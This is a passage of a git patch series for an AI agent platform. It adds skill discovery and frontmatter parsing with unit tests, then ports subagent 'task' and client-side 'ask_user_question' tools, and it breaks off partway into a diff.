+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+
+vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({
+  resolveSandboxHomeDirectory: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandboxSkillDirectories", () => {
+  it("returns just the global skill dir under the resolved $HOME", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never);
+    expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]);
+  });
+
+  it("works with the /root fallback (open-agents base image)", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never);
+    expect(dirs).toEqual(["/root/.agents/skills"]);
+  });
+});
diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts
new file mode 100644
index 000000000..8ffd47e24
--- /dev/null
+++ b/lib/skills/__tests__/getSkills.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { getSkills } from "@/lib/skills/getSkills";
+
+const validCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+const sample = {
+  name: "recoup-api",
+  description: "Recoupable API skill",
+  path: "/home/vercel-sandbox/.agents/skills/recoup-api",
+  filename: "SKILL.md",
+  options: {},
+};
+
+describe("getSkills", () => {
+  it("returns the skills array when present in a valid AgentContext", () => {
+    expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]);
+  });
+
+  it("returns [] when no skills field is set", () => {
+    expect(getSkills(validCtx)).toEqual([]);
+  });
+
+  it("returns [] for malformed contexts (non-AgentContext shape)", () => {
+    expect(getSkills(undefined)).toEqual([]);
+    expect(getSkills(null)).toEqual([]);
+    expect(getSkills({ noSandbox: true })).toEqual([]);
+    expect(getSkills({ sandbox: null })).toEqual([]);
+  });
+});
diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts
new file mode 100644
index 000000000..ac6d646bb
--- /dev/null
+++ b/lib/skills/__tests__/injectSkillDirectory.test.ts
@@ -0,0 +1,14 @@
+import { describe, it, expect } from "vitest";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+
+describe("injectSkillDirectory", () => {
+  it("prepends a `Skill directory: <path>` header followed by a blank line", () => {
+    expect(injectSkillDirectory("body content", "/skills/foo")).toBe(
+      "Skill directory: /skills/foo\n\nbody content",
+    );
+  });
+
+  it("works with empty body", () => {
+    expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n");
+  });
+});
diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
new file mode 100644
index 000000000..91dfcf7c1
--- /dev/null
+++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
@@ -0,0 +1,56 @@
+import { describe, it, expect } from "vitest";
+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+
+describe("parseSkillFrontmatter", () => {
+  it("parses a minimal frontmatter (name + description)", () => {
+    const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.name).toBe("commit");
+    expect(result.data.description).toBe("Make a git commit");
+  });
+
+  it("unwraps double-quoted values (including escaped quotes)", () => {
+    const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe('Has "quotes" inside');
+  });
+
+  it("parses booleans for unquoted true/false", () => {
+    const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data["disable-model-invocation"]).toBe(true);
+    expect(result.data["user-invocable"]).toBe(false);
+  });
+
+  it("treats `true`/`false` inside quotes as strings (not booleans)", () => {
+    const md = `---\nname: foo\ndescription: "true"\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("true");
+  });
+
+  it("returns success:false when frontmatter is missing", () => {
+    const result = parseSkillFrontmatter("just markdown, no frontmatter");
+    expect(result.success).toBe(false);
+  });
+
+  it("returns success:false when required fields are absent", () => {
+    const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`);
+    expect(result.success).toBe(false);
+  });
+
+  it("preserves colons in values (e.g. URLs)", () => {
+    const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("see https://example.com");
+  });
+});
diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts
new file mode 100644
index 000000000..db4fb0aa9
--- /dev/null
+++ b/lib/skills/__tests__/substituteArguments.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+describe("substituteArguments", () => {
+  it("replaces $ARGUMENTS with the provided args", () => {
+    expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe(
+      "run with --flag value",
+    );
+  });
+
+  it("replaces all occurrences", () => {
+    expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x");
+  });
+
+  it("substitutes empty string when args are undefined", () => {
+    expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with ");
+  });
+
+  it("leaves text unchanged when $ARGUMENTS is absent", () => {
+    expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here");
+  });
+});
diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts
new file mode 100644
index 000000000..9ae0ced67
--- /dev/null
+++ b/lib/skills/discoverSkills.ts
@@ -0,0 +1,89 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Built-in commands that skills cannot shadow. Skills with these names
+ * would be unreachable via slash command, so we drop them at discovery.
+ */
+const BUILTIN_COMMANDS = ["model", "resume", "new"];
+
+/**
+ * Scan a list of directories for skills. Each directory is expected to
+ * contain one subdirectory per skill, with a SKILL.md (or skill.md)
+ * inside. Returns metadata for everything discoverable; silently skips
+ * non-directories, missing files and malformed frontmatter, and skips
+ * (with a warning) names that shadow built-in slash commands.
+ *
+ * Dedupes by name (case-insensitive); first-wins across directories so
+ * callers can list project skills before global skills and have project
+ * shadow global.
+ *
+ * @param sandbox - Connected sandbox for file ops.
+ * @param directories - Absolute sandbox (POSIX) paths to scan, in priority order.
+ */
+export async function discoverSkills(
+  sandbox: Sandbox,
+  directories: string[],
+): Promise<SkillMetadata[]> {
+  const skills: SkillMetadata[] = [];
+  const seen = new Set<string>();
+
+  for (const dir of directories) {
+    try {
+      const stat = await sandbox.stat(dir);
+      if (!stat.isDirectory()) continue;
+    } catch {
+      continue; // directory doesn't exist
+    }
+
+    let entries;
+    try {
+      entries = await sandbox.readdir(dir, { withFileTypes: true });
+    } catch {
+      continue;
+    }
+
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+
+      const skillDir = path.posix.join(dir, entry.name); // sandbox paths always use `/`
+      const skillFile = await findSkillFile(sandbox, skillDir);
+      if (!skillFile) continue;
+
+      let content: string;
+      try {
+        content = await sandbox.readFile(skillFile, "utf-8");
+      } catch {
+        continue;
+      }
+
+      const parsed = parseSkillFrontmatter(content);
+      if (!parsed.success) continue;
+      const frontmatter = parsed.data;
+
+      const normalized = frontmatter.name.toLowerCase();
+      if (BUILTIN_COMMANDS.includes(normalized)) {
+        console.warn(
+          `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`,
+        );
+        continue;
+      }
+
+      if (seen.has(normalized)) continue;
+      seen.add(normalized);
+
+      skills.push({
+        name: frontmatter.name,
+        description: frontmatter.description,
+        path: skillDir,
+        filename: path.posix.basename(skillFile),
+        options: frontmatterToOptions(frontmatter),
+      });
+    }
+  }
+
+  return skills;
+}
diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts
new file mode 100644
index 000000000..d1dcb3f5e
--- /dev/null
+++ b/lib/skills/extractSkillBody.ts
@@ -0,0 +1,14 @@
+/**
+ * Strip the YAML frontmatter from a SKILL.md file and return just the
+ * markdown body. Returns the entire content (trimmed) when no
+ * frontmatter is present.
+ *
+ * @param fileContent - Full file content read from sandbox.
+ */
+export function extractSkillBody(fileContent: string): string {
+  const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
+  if (match) {
+    return fileContent.slice(match[0].length).trim();
+  }
+  return fileContent.trim();
+}
diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts
new file mode 100644
index 000000000..a81b9e415
--- /dev/null
+++ b/lib/skills/findSkillFile.ts
@@ -0,0 +1,33 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+
+/**
+ * Locate the SKILL.md file inside a candidate skill directory. Prefers
+ * uppercase `SKILL.md` (the project convention) but falls back to
+ * lowercase `skill.md` for skills that ship the lowercase name. Returns
+ * `null` when neither file exists so callers can skip the entry.
+ *
+ * Probes via `sandbox.access` (which throws on missing) rather than
+ * `readdir`, so no directory listing is paid for. Joins with
+ * `path.posix` so sandbox paths keep `/` separators on any host OS.
+ *
+ * @param sandbox - Connected sandbox handle.
+ * @param skillDir - Absolute path to the candidate skill directory.
+ */
+export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise<string | null> {
+  const uppercase = path.posix.join(skillDir, "SKILL.md");
+  const lowercase = path.posix.join(skillDir, "skill.md");
+
+  try {
+    await sandbox.access(uppercase);
+    return uppercase;
+  } catch {
+    // try lowercase
+  }
+  try {
+    await sandbox.access(lowercase);
+    return lowercase;
+  } catch {
+    return null;
+  }
+}
diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts
new file mode 100644
index 000000000..788a6dfc7
--- /dev/null
+++ b/lib/skills/getGlobalSkillsDirectory.ts
@@ -0,0 +1,14 @@
+import * as path from "path";
+
+/**
+ * Resolve the absolute path to the global skills directory under a
+ * given `$HOME`. This is where `installSessionGlobalSkills` lays down
+ * skills at sandbox provisioning time via `npx skills add ... -g`
+ * (today: `recoup-api`, `artist-workspace`).
+ *
+ * @param homeDirectory - The sandbox's resolved $HOME (e.g.
+ *   `/home/vercel-sandbox`, or `/root` on the open-agents base image).
+ */
+export function getGlobalSkillsDirectory(homeDirectory: string): string {
+  return path.posix.join(homeDirectory, ".agents", "skills");
+}
diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts
new file mode 100644
index 000000000..81645ea46
--- /dev/null
+++ b/lib/skills/getSandboxSkillDirectories.ts
@@ -0,0 +1,16 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+/**
+ * Resolve the directory list to scan when discovering skills for a
+ * sandbox. Currently just one path — `${HOME}/.agents/skills/` —
+ * because all skills are provisioned globally at sandbox startup via
+ * `installSessionGlobalSkills` rather than bundled into the cloned repo.
+ *
+ * @param sandbox - Connected sandbox handle.
+ */
+export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise<string[]> {
+  const homeDirectory = await resolveSandboxHomeDirectory(sandbox);
+  return [getGlobalSkillsDirectory(homeDirectory)];
+}
diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts
new file mode 100644
index 000000000..d2d29ed7d
--- /dev/null
+++ b/lib/skills/getSkills.ts
@@ -0,0 +1,22 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Read the discovered skill catalog out of the agent's
+ * `experimental_context`. The catalog is populated by the chat handler
+ * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`
+ * before workflow start, then threaded through as
+ * `AgentContext.skills`. Returns `[]` when the context shape is wrong
+ * or no skills were discovered.
+ *
+ * Lives in its own file so consumers (the `skill` tool today, future
+ * skill-aware system prompts tomorrow) share one accessor instead of
+ * each reimplementing the context-cast.
+ *
+ * @param experimental_context - Opaque context object passed by AI SDK to tool execute.
+ */
+export function getSkills(experimental_context: unknown): SkillMetadata[] {
+  if (!isAgentContext(experimental_context)) return [];
+  const ctx = experimental_context as { skills?: SkillMetadata[] };
+  return ctx.skills ?? [];
+}
diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts
new file mode 100644
index 000000000..cf4bf58d5
--- /dev/null
+++ b/lib/skills/injectSkillDirectory.ts
@@ -0,0 +1,11 @@
+/**
+ * Prepend a `Skill directory: <absolute-path>` header to a skill body
+ * so the model can construct full paths to scripts and resources living
+ * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`).
+ *
+ * @param body - Skill body (after frontmatter strip).
+ * @param skillDir - Absolute sandbox path to the skill directory.
+ */
+export function injectSkillDirectory(body: string, skillDir: string): string {
+  return `Skill directory: ${skillDir}\n\n${body}`;
+}
diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts
new file mode 100644
index 000000000..3d2888d76
--- /dev/null
+++ b/lib/skills/parseSkillFrontmatter.ts
@@ -0,0 +1,52 @@
+import { skillFrontmatterSchema } from "@/lib/skills/skillTypes";
+
+/**
+ * Parse YAML frontmatter from SKILL.md content. Returns the Zod
+ * `safeParse` shape so callers can branch cleanly on success.
+ *
+ * Intentionally a hand-rolled subset of YAML (one-line `key: value`
+ * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't
+ * pull a YAML dep just to read a 3-line block.
+ *
+ * @param content - Full SKILL.md content (including the leading `---`).
+ */
+export function parseSkillFrontmatter(
+  content: string,
+): ReturnType<typeof skillFrontmatterSchema.safeParse> {
+  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
+  if (!match?.[1]) {
+    return {
+      success: false,
+      error: new Error("No frontmatter found") as never,
+    };
+  }
+
+  const yaml = match[1];
+  const parsed: Record<string, unknown> = {};
+
+  for (const line of yaml.split("\n")) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith("#")) continue;
+
+    const colonIndex = trimmed.indexOf(":");
+    if (colonIndex === -1) continue;
+
+    const key = trimmed.slice(0, colonIndex).trim();
+    // Only split on the first colon so values like URLs stay intact.
+    let value: string | boolean = trimmed.slice(colonIndex + 1).trim();
+
+    if (value.startsWith('"') && value.endsWith('"')) {
+      value = value.slice(1, -1).replace(/\\"/g, '"');
+    } else if (value.startsWith("'") && value.endsWith("'")) {
+      value = value.slice(1, -1).replace(/\\'/g, "'");
+    } else if (value === "true") {
+      value = true;
+    } else if (value === "false") {
+      value = false;
+    }
+
+    parsed[key] = value;
+  }
+
+  return skillFrontmatterSchema.safeParse(parsed);
+}
diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts
new file mode 100644
index 000000000..77fffd055
--- /dev/null
+++ b/lib/skills/skillTypes.ts
@@ -0,0 +1,76 @@
+import { z } from "zod";
+
+/**
+ * Zod schema for skill frontmatter YAML validation. Defines the
+ * expected structure at the top of SKILL.md files.
+ */
+export const skillFrontmatterSchema = z.object({
+  name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"),
+  description: z
+    .string()
+    .min(1, "Skill description cannot be empty")
+    .describe("Short description for the agent"),
+  version: z.string().optional().describe("Skill version"),
+  "disable-model-invocation": z
+    .boolean()
+    .optional()
+    .describe("If true, the model cannot invoke this skill automatically"),
+  "user-invocable": z
+    .boolean()
+    .optional()
+    .describe("If false, users cannot invoke this skill via slash command"),
+  "allowed-tools": z
+    .string()
+    .optional()
+    .describe("Comma-separated list of allowed tools when skill is active"),
+  context: z.enum(["fork"]).optional().describe("Execution context for the skill"),
+  agent: z.string().optional().describe("Agent type to use for execution"),
+});
+
+export type SkillFrontmatter = z.infer<typeof skillFrontmatterSchema>;
+
+/**
+ * Normalized skill options derived from frontmatter — camelCase fields,
+ * comma-separated lists pre-split.
+ */
+export interface SkillOptions {
+  disableModelInvocation?: boolean;
+  userInvocable?: boolean;
+  allowedTools?: string[];
+  context?: "fork";
+  agent?: string;
+}
+
+/**
+ * Skill metadata stored on `AgentContext.skills`. Contains only what
+ * `skillTool` needs at invocation time — the SKILL.md body is loaded
+ * lazily.
+ */
+export interface SkillMetadata {
+  /** Unique name of the skill. */
+  name: string;
+  /** Short description for the agent. */
+  description: string;
+  /** Absolute sandbox path to the skill directory. */
+  path: string;
+  /** Filename of the skill file (`SKILL.md` or `skill.md`). */
+  filename: string;
+  /** Skill options from frontmatter. */
+  options: SkillOptions;
+}
+
+/**
+ * Normalize parsed frontmatter to {@link SkillOptions}.
+ */
+export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions {
+  return {
+    disableModelInvocation: frontmatter["disable-model-invocation"],
+    userInvocable: frontmatter["user-invocable"],
+    allowedTools: frontmatter["allowed-tools"]
+      ?.split(",")
+      .map(t => t.trim())
+      .filter(Boolean),
+    context: frontmatter.context,
+    agent: frontmatter.agent,
+  };
+}
diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts
new file mode 100644
index 000000000..44500bc58
--- /dev/null
+++ b/lib/skills/substituteArguments.ts
@@ -0,0 +1,14 @@
+/**
+ * Replace all occurrences of `$ARGUMENTS` in a skill body with the
+ * provided args string (or empty string when no args were passed).
+ * Args are inserted literally: a replacer function is used so `$&`,
+ * `$$`, `$1`, etc. in `args` are not expanded by `String.replace`.
+ *
+ * Used by `skillTool` after loading SKILL.md so slash-command-style
+ * invocations like `/commit -m "fix"` reach the skill's body text.
+ * @param body - Skill body (markdown after frontmatter).
+ * @param args - Optional arguments passed by the model, used verbatim.
+ */
+export function substituteArguments(body: string, args?: string): string {
+  return body.replace(/\$ARGUMENTS/g, () => args ?? "");
+}

From b36aa5846115cc30f18bc317aba2fca34fa431b5 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 17:45:47 -0500
Subject: [PATCH 06/10] feat(chat-workflow): port task + ask_user_question
 composite tools (PR 7) (#589)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  25 ++-
 app/lib/workflows/runAgentWorkflow.ts         |   9 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  26 ++--
 lib/agent/buildAgentTools.ts                  |  27 +++-
 lib/agent/tools/AgentContext.ts               |  35 ++++-
 .../__tests__/askUserQuestionTool.test.ts     | 111 +++++++++++++
 lib/agent/tools/__tests__/taskTool.test.ts    | 146 ++++++++++++++++++
 lib/agent/tools/askUserQuestionTool.ts        |  90 +++++++++++
 lib/agent/tools/buildSubagentTools.ts         |  32 ++++
 lib/agent/tools/getMainModel.ts               |  26 ++++
 lib/agent/tools/getSubagentModel.ts           |  24 +++
 lib/agent/tools/taskTool.ts                   | 122 +++++++++++++++
 12 files changed, 644 insertions(+), 29 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/askUserQuestionTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/taskTool.test.ts
 create mode 100644 lib/agent/tools/askUserQuestionTool.ts
 create mode 100644 lib/agent/tools/buildSubagentTools.ts
 create mode 100644 lib/agent/tools/getMainModel.ts
 create mode 100644 lib/agent/tools/getSubagentModel.ts
 create mode 100644 lib/agent/tools/taskTool.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 704035c64..b487285dc 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -3,17 +3,21 @@ import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
-import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
   /**
-   * Threaded into `streamText`'s `experimental_context` so each tool's
-   * `execute` callback can read the sandbox state + per-prompt context.
+   * The JSON-serializable agent context that survives the durable
+   * workflow input. `runAgentStep` widens it into a full `AgentContext`
+   * by attaching `model` (and optionally `subagentModel`) before
+   * threading into `streamText`'s `experimental_context`. Mirrors
+   * open-agents' prepareCall pattern, where the constructed callModel
+   * is added to `experimental_context` right before each model call.
    */
-  agentContext: AgentContext;
+  agentContext: DurableAgentContext;
 };
 
 /**
@@ -43,13 +47,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
 
   const modelMessages = convertToModelMessages(input.messages);
   const tools = buildAgentTools({ skills: input.agentContext.skills });
+  // Construct the model here (not in the workflow input) — LanguageModel
+  // instances aren't JSON-serializable and can't ride durable inputs.
+  // Then attach to AgentContext so tools see the same model the parent
+  // is using, matching open-agents' `prepareCall` pattern.
+  const callModel = gateway(input.modelId);
+  const agentContext: AgentContext = {
+    ...input.agentContext,
+    model: callModel,
+  };
   const result = streamText({
-    model: gateway(input.modelId),
+    model: callModel,
     system: agentCustomInstructions,
     messages: modelMessages,
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
-    experimental_context: input.agentContext,
+    experimental_context: agentContext,
   });
 
   // Acquire the writer once and release in `finally` so a thrown chunk
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index ce65b0bb3..3a0965342 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,7 +1,7 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
-import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+import type { DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
@@ -9,10 +9,11 @@ export type RunAgentWorkflowInput = {
   sessionId: string;
   modelId: string;
   /**
-   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
-   * can read sandbox state + per-prompt Recoup creds.
+   * JSON-serializable subset of AgentContext that survives the durable
+   * workflow input. `runAgentStep` attaches the constructed `model`
+   * before threading into `streamText`'s `experimental_context`.
    */
-  agentContext: AgentContext;
+  agentContext: DurableAgentContext;
 };
 
 /**
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index fb5d99a5a..e684818f2 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const BASE_TOOLS = [
+const ALWAYS_PRESENT = [
   "bash",
   "read",
   "write",
@@ -10,18 +10,20 @@ const BASE_TOOLS = [
   "glob",
   "todo_write",
   "web_fetch",
+  "task",
+  "ask_user_question",
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
+  it("registers the 10 always-on tools by default", () => {
     const tools = buildAgentTools();
-    for (const name of BASE_TOOLS) {
+    for (const name of ALWAYS_PRESENT) {
       expect(tools).toHaveProperty(name);
     }
     expect(tools).not.toHaveProperty("skill");
   });
 
-  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+  it("conditionally adds `skill` when a non-empty skill catalog is provided", () => {
     const tools = buildAgentTools({
       skills: [
         {
@@ -34,17 +36,17 @@ describe("buildAgentTools", () => {
       ],
     });
     expect(tools).toHaveProperty("skill");
-    for (const name of BASE_TOOLS) {
+    for (const name of ALWAYS_PRESENT) {
       expect(tools).toHaveProperty(name);
     }
   });
 
-  it("omits the skill tool when an empty array is passed", () => {
+  it("omits `skill` when an empty array is passed", () => {
     const tools = buildAgentTools({ skills: [] });
     expect(tools).not.toHaveProperty("skill");
   });
 
-  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+  it("each tool exposes the AI SDK shape (description + inputSchema)", () => {
     const tools = buildAgentTools({
       skills: [
         {
@@ -55,12 +57,16 @@ describe("buildAgentTools", () => {
           options: {},
         },
       ],
-    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
-    for (const name of [...BASE_TOOLS, "skill"]) {
+    }) as Record<string, { description?: unknown; inputSchema?: unknown }>;
+    for (const name of [...ALWAYS_PRESENT, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
-      expect(typeof t.execute).toBe("function");
     }
   });
+
+  it("`ask_user_question` has no server execute (client-side tool)", () => {
+    const tools = buildAgentTools() as Record<string, { execute?: unknown }>;
+    expect(tools.ask_user_question?.execute).toBeUndefined();
+  });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index 393b32889..728334b11 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
